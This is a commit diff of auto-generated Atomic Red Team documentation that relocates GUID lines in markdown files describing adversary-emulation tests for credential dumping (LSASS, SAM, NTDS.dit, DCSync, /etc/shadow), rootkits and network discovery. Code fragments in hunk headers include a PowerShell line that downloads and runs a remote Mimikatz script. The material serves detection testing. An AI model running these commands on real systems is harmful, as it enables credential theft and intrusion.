security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2021-06-24 17:04:33 +00:00
parent 390bcd3796
commit 36d49de4c8
223 changed files with 3625 additions and 2175 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003.001/T1003.001.md
+60 -36
View File
@@ -54,9 +54,6 @@ The following SSPs can be used to access credentials:
<br/>
## Atomic Test #1 - Windows Credential Editor
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
@@ -64,9 +61,14 @@ Upon successful execution, you should see a file with user passwords/hashes at %
If you see no output it is likely that execution was blocked by Anti-Virus.
If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
#### Inputs:
@@ -117,18 +119,20 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
@@ -174,15 +178,17 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
@@ -206,18 +212,20 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
<br/>
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
@@ -260,14 +268,16 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
@@ -292,14 +302,16 @@ Manager and administrative permissions.
<br/>
## Atomic Test #6 - Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
**Supported Platforms:** Windows
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
@@ -358,17 +370,19 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
<br/>
## Atomic Test #7 - LSASS read with pypykatz
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
@@ -421,15 +435,17 @@ pip install pypykatz
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
@@ -454,18 +470,20 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
@@ -510,16 +528,18 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
<br/>
## Atomic Test #10 - Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
@@ -544,14 +564,16 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
<br/>
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
**Supported Platforms:** Windows
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Inputs:
@@ -597,17 +619,19 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
atomics/T1003.002/T1003.002.md
+20 -12
View File
@@ -36,16 +36,18 @@ Notes:
<br/>
## Atomic Test #1 - Registry dump of SAM, creds, and secrets
auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
@@ -73,13 +75,15 @@ del %temp%\security >nul 2> nul
<br/>
## Atomic Test #2 - Registry parse with pypykatz
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
@@ -132,14 +136,16 @@ pip install pypykatz
<br/>
## Atomic Test #3 - esentutl.exe SAM copy
auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
@@ -170,13 +176,15 @@ del #{copy_dest}\#{file_name} >nul 2>&1
<br/>
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
Executes a hashdump by reading the hasshes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
atomics/T1003.003/T1003.003.md
+30 -18
View File
@@ -30,15 +30,17 @@ The following tools and techniques can be used to enumerate the NTDS file and th
<br/>
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin
auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
#### Inputs:
@@ -75,9 +77,6 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy
auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -85,9 +84,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
#### Inputs:
@@ -151,9 +155,6 @@ mkdir #{extract_path}
<br/>
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil
auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -161,9 +162,14 @@ uses the "IFM" or "Install From Media" backup functionality that allows Active D
subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
#### Inputs:
@@ -205,15 +211,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
## Atomic Test #4 - Create Volume Shadow Copy with WMI
auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
#### Inputs:
@@ -250,15 +258,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
## Atomic Test #5 - Create Volume Shadow Copy with Powershell
auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
#### Inputs:
@@ -283,15 +293,17 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
<br/>
## Atomic Test #6 - Create Symlink to Volume Shadow Copy
auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
#### Inputs:
atomics/T1003.004/T1003.004.md
+5 -3
View File
@@ -12,16 +12,18 @@
<br/>
## Atomic Test #1 - Dumping LSA Secrets
auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
**Supported Platforms:** Windows
**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
#### Inputs:
atomics/T1003.006/T1003.006.md
+5 -3
View File
@@ -14,16 +14,18 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
<br/>
## Atomic Test #1 - DCSync
auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
**Supported Platforms:** Windows
**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
#### Inputs:
atomics/T1003.007/T1003.007.md
+10 -6
View File
@@ -14,14 +14,16 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
<br/>
## Atomic Test #1 - Dump individual process memory with sh (Local)
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
#### Inputs:
@@ -73,14 +75,16 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa
<br/>
## Atomic Test #2 - Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
#### Inputs:
atomics/T1003.008/T1003.008.md
+10 -6
View File
@@ -15,13 +15,15 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
<br/>
## Atomic Test #1 - Access /etc/shadow (Local)
auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235
/etc/shadow file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
#### Inputs:
@@ -51,13 +53,15 @@ rm -f #{output_file}
<br/>
## Atomic Test #2 - Access /etc/passwd (Local)
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
/etc/passwd file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
#### Inputs:
atomics/T1003/T1003.md
+10 -6
View File
@@ -15,9 +15,6 @@ Several of the tools mentioned in associated sub-techniques may be used by both
<br/>
## Atomic Test #1 - Gsecdump
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's following by two 32 characters hashes.
@@ -26,9 +23,14 @@ If you see output that says "compat: error: failed to create child process", exe
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
**Supported Platforms:** Windows
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
@@ -72,16 +74,18 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
<br/>
## Atomic Test #2 - Credential Dumping with NPPSpy
auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
**Supported Platforms:** Windows
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
atomics/T1006/T1006.md
+5 -3
View File
@@ -12,9 +12,6 @@ Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Cit
<br/>
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)
auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
@@ -24,9 +21,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS
```
**Supported Platforms:** Windows
**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
#### Inputs:
atomics/T1007/T1007.md
+10 -6
View File
@@ -12,15 +12,17 @@
<br/>
## Atomic Test #1 - System Service Discovery
auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71
Identify system services.
Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
@@ -42,15 +44,17 @@ sc query state= all
<br/>
## Atomic Test #2 - System Service Discovery - net.exe
auto_generated_guid: 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s
**Supported Platforms:** Windows
**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
#### Inputs:
atomics/T1010/T1010.md
+5 -3
View File
@@ -10,15 +10,17 @@
<br/>
## Atomic Test #1 - List Process Main Windows - C# .NET
auto_generated_guid: fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
Compiles and executes C# code to list main window titles associated with each process.
Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
#### Inputs:
atomics/T1012/T1012.md
+5 -3
View File
@@ -12,9 +12,6 @@ The Registry contains a significant amount of information about the operating sy
<br/>
## Atomic Test #1 - Query Registry
auto_generated_guid: 8f7578c4-9863-4d83-875c-a565573bbdf0
Query Windows Registry.
Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
References:
@@ -22,9 +19,14 @@ https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-se
https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
**Supported Platforms:** Windows
**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
atomics/T1014/T1014.md
+15 -9
View File
@@ -16,13 +16,15 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
<br/>
## Atomic Test #1 - Loadable Kernel Module based Rootkit
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
#### Inputs:
@@ -70,13 +72,15 @@ mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
<br/>
## Atomic Test #2 - Loadable Kernel Module based Rootkit
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
#### Inputs:
@@ -127,9 +131,6 @@ sudo depmod -a
<br/>
## Atomic Test #3 - Windows Signed Driver Rootkit Test
auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
This test exploits a signed driver to execute code in Kernel.
This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys.
The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html
@@ -139,9 +140,14 @@ https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.htm
The hash of our PoC Exploit is
SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
This will simulate hiding a process.
**Supported Platforms:** Windows
**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
#### Inputs:
atomics/T1016/T1016.md
+40 -24
View File
@@ -26,15 +26,17 @@ Adversaries may use the information from [System Network Configuration Discovery
<br/>
## Atomic Test #1 - System Network Configuration Discovery on Windows
auto_generated_guid: 970ab6a1-0157-4f3f-9a73-ec4166754b23
Identify network configuration information
Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
@@ -58,15 +60,17 @@ net config
<br/>
## Atomic Test #2 - List Windows Firewall Rules
auto_generated_guid: 038263cb-00f4-4b0a-98ae-0696c67e1752
Enumerates Windows Firewall Rules using netsh.
Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
@@ -86,15 +90,17 @@ netsh advfirewall firewall show rule name=all
<br/>
## Atomic Test #3 - System Network Configuration Discovery
auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -117,15 +123,17 @@ if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep
<br/>
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)
auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
@@ -148,16 +156,18 @@ nltest /domain_trusts
<br/>
## Atomic Test #5 - List Open Egress Ports
auto_generated_guid: 4b467538-f102-491d-ace7-ed487b853bf5
This is to test for what ports are open outbound. The technique used was taken from the following blog:
https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
#### Inputs:
@@ -226,14 +236,16 @@ Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
<br/>
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects
auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
#### Inputs:
@@ -270,13 +282,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #7 - Qakbot Recon
auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b
A list of commands known to be performed by Qakbot for recon purposes
**Supported Platforms:** Windows
**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
#### Inputs:
@@ -301,17 +315,19 @@ A list of commands known to be performed by Qakbot for recon purposes
<br/>
## Atomic Test #8 - List macOS Firewall Rules
auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
**Supported Platforms:** macOS
**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
atomics/T1018/T1018.md
+55 -33
View File
@@ -32,15 +32,17 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition
<br/>
## Atomic Test #1 - Remote System Discovery - net
auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd
Identify remote systems with net.exe.
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
**Supported Platforms:** Windows
**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
@@ -61,15 +63,17 @@ net view
<br/>
## Atomic Test #2 - Remote System Discovery - net group Domain Computers
auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f
Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
@@ -89,15 +93,17 @@ net group "Domain Computers" /domain
<br/>
## Atomic Test #3 - Remote System Discovery - nltest
auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
Identify domain controllers for specified domain.
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
#### Inputs:
@@ -122,15 +128,17 @@ nltest.exe /dclist:#{target_domain}
<br/>
## Atomic Test #4 - Remote System Discovery - ping sweep
auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
@@ -150,15 +158,17 @@ for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
<br/>
## Atomic Test #5 - Remote System Discovery - arp
auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
@@ -178,15 +188,17 @@ arp -a
<br/>
## Atomic Test #6 - Remote System Discovery - arp nix
auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -218,15 +230,17 @@ echo "Install arp on the machine."; exit 1;
<br/>
## Atomic Test #7 - Remote System Discovery - sweep
auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
#### Inputs:
@@ -253,15 +267,17 @@ for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -e
<br/>
## Atomic Test #8 - Remote System Discovery - nslookup
auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
@@ -286,15 +302,17 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
<br/>
## Atomic Test #9 - Remote System Discovery - adidnsdump
auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
